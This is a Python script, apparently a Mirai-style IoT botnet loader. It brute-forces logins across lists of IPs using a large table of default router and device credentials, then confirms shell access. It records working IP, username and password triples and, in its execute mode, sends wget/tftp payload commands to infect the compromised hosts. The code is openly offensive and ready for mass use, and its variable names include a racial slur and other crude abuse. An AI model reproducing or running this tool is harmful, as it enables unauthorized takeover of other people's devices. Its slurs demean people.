#!/usr/bin/env python # -*- coding: utf-8 -*- import os, socket, sys, time, threading, StringIO, argparse, random jackmeoff = random.choice(["see nudes of R00tGod"]) raw_input('Press to '+jackmeoff) print "\n" print "▀█████████▄ ███ █▄ ▄███████▄ ▄██ ▄ ▀█████████▄ ▄██████▄ ▀████ ▐████▀ " print " ███ ███ ███ ███ ██▀ ▄██ ███ ██▄ ███ ███ ███ ███ ███▌ ████▀ " print " ███ ███ ███ ███ ▄███▀ ███▄▄▄███ ███ ███ ███ ███ ███ ▐███ " print " ▄███▄▄▄██▀ ███ ███ ▀█▀▄███▀▄▄ ▀▀▀▀▀▀███ ▄███▄▄▄██▀ ███ ███ ▀███▄███▀ " print "▀▀███▀▀▀██▄ ███ ███ ▄███▀ ▀ ▄██ ███ ▀▀███▀▀▀██▄ ███ ███ ████▀██▄ " print " ███ ██▄ ███ ███ ▄███▀ ███ ███ ███ ██▄ ███ ███ ▐███ ▀███ " print " ███ ███ ███ ███ ███▄ ▄█ ███ ███ ███ ███ ███ ███ ▄███ ███▄ " print "▄█████████▀ ████████▀ ▀████████▀ ▀█████▀ ▄█████████▀ ▀██████▀ ████ ███▄ " print "\n" parser = argparse.ArgumentParser() parser.add_argument("-b","--brute",type=str, help="Brute force from list of IPs") parser.add_argument("-x","--execute",type=str, help="Execute using wget/tftp from list of IPs+user+pass") parser.add_argument("output",type=str,help="Output filename") parser.add_argument("threadcount",type=int,help="The number of threads to use") args=parser.parse_args() tpayload = "TFTPAYLOAD" wpayload = "WGETPAYLOAD" payload = tpayload+"\r\n"+wpayload+'\r\n' Thread = threading.Thread userlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor', 'security', '', 'security', 'storwatch', '', 'specialist', 'super', '', '5777364', 'superadmin', '', 'secret', 'superman', '', '21241036', 'support', '', 'support', 'tech', '', 'tech', 'technician', '', 'T!m3W4rn3rC4bl3', 'test', '', 'test', 'ubnt', '', 'ubnt', 'UN', '', 'unknown', 'user', '', 'user', 'volition', '', 'volition', 'vt100', '', 'public', 'VTech', '', 'VTech'] passlist = [ 'root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor'] thread_cnt = args.threadcount if args.brute: read_h = open(str(args.brute),'a+') niggers420 = '' def sock_read_until(tn, criteria, timeout=30): shitbuffer = '' start_time = time.time() while time.time() - start_time < timeout: shitbuffer += tn.recv(40960) time.sleep(0.01) if criteria in shitbuffer: return shitbuffer raise Exception('sock_read_until \x1b[1;33m timeout \x1b[ 0m') def iac_wont(tn, feature): # print 'wont',feature tn.send("\xff\xfb"+chr(feature)) def iac_dont(tn, feature): # print 'dont',feature tn.send("\xff\xfe"+chr(feature)) def mass_check(read_h): try: for line in open(read_h).readlines(): ip_info = line.split(":") e = Thread(target=f, args=(ip_info[0],)) e.start() print threading.active_count() while threading.active_count() > thread_cnt: pass except KeyboardInterrupt: os.kill(os.getpid(),9) def mass_pwn(targets_file): try: targets_file_h = open(targets_file).readlines() for line in targets_file_h: ip_info = line.split(":") try: e = Thread(target=loadem, args=(ip_info[0],ip_info[1],ip_info[2])) e.start() except: pass print '[Thread]: ',threading.active_count() while threading.active_count() > thread_cnt: # time.sleep(0.5) pass except KeyboardInterrupt: os.kill(os.getpid(),9) def loadem(HOST,user,password): host = HOST try: x = '' tn = socket.socket() tn.connect((HOST,22)) # print "Connected to "+HOST print tn.recv(40960) tn.send(user + "\n") time.sleep(1) print sock_read_until(tn,":",10) tn.send(password + "\n") print "Spraying "+HOST tn.send("sh\r\n\r\n") time.sleep(0.01) tn.send("shell\r\n\r\n") time.sleep(0.01) x += sock_read_until(tn,"#",10) print '[+] Got shell! '+HOST if ('rong' in x) or ('nvalid' in x) or ('ncorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('ailure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('nformation incomplete' in x): raise Exception('fucked') for line in payload.split("\n"): # print 'Sending line '+line tn.send(line+'\r\n') x = tn.recv(40960) if '> ' in x: raise Exception # because fuck those. # print x try: arch = sock_read_until(tn,"#",3) except: arch = 'dicks' print arch return arch except: pass def f(ip): ip = ip.rstrip() iac_wont_b = 0 iac_dont_b = 0 for user in userlist: for passw in passlist: x = '' try: tn = socket.socket() tn.settimeout(35) tn.connect((ip,22)) except Exception as e: print "\x1b[1;31m[x] Failed: \x1b[0m", ip, e break else: try: x += tn.recv(40960) except Exception as e: print "\x1b[1;33m[x] Timeout: \x1b[0m", ip,e break else: try: niggers420='' time.sleep(0.1) x += tn.recv(40960) sio = StringIO.StringIO(x) try: for i in sio.read(15): # print str(ord(i)) if ord(i) == 251: # IAC WILL iac_dont_b = 1 elif ord(i) == 253: # IAC DO # print 'set wont b' iac_wont_b = 1 elif iac_wont_b == 1: iac_wont(tn,ord(i)) iac_wont_b = 0 elif iac_dont_b == 1: iac_dont(tn,ord(i)) iac_dont_b = 0 except: print "IAC wtf?" # print 'iac done!' tn.send(user + "\r\n") time.sleep(0.01) if 'User Access Verification' in x: raise Exception('cisco dicks') x += sock_read_until(tn,":") if 'ogin:' not in x and 'sername:' not in x: raise Exception('no login?') tn.send(passw + "\r\n\r\n") x += tn.recv(409600) tn.send("sh\r\n\r\n") time.sleep(0.01) tn.send("shell\r\n\r\n") time.sleep(0.01) sock_read_until(tn,"#") tn.send("echo -e '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\r\n\r\n") time.sleep(0.01) x += tn.recv(409600) time.sleep(0.01) try: x += sock_read_until(tn,"binfagt") # print x # if 'Welcome to ZTE' in x: raise Exception('ZTE') if 'binfagt' not in x: raise Exception('no binfagt') if '#' not in x and '>' not in x and '%' not in x and '$' not in x and ':' not in x: raise Exception('no prompt') if ('rong' in x) or ('nvalid' in x) or ('ncorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('ailure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('nformation incomplete' in x): raise Exception('fucked') except Exception as e: print "[failed execution]", e,ip.rstrip() continue else: file_h = open(args.output,'a+') file_h.write(ip.rstrip() + ":" + user + ":" + passw+'\n') file_h.close() print '\x1b[1;32m[*] Execution on: \x1b[0m ', ip break except Exception as e: # print "Timeout: ", ip, e continue continue continue continue return "my nutsack" #p.join() if args.execute: mass_pwn(args.execute) elif args.brute: mass_check(args.brute)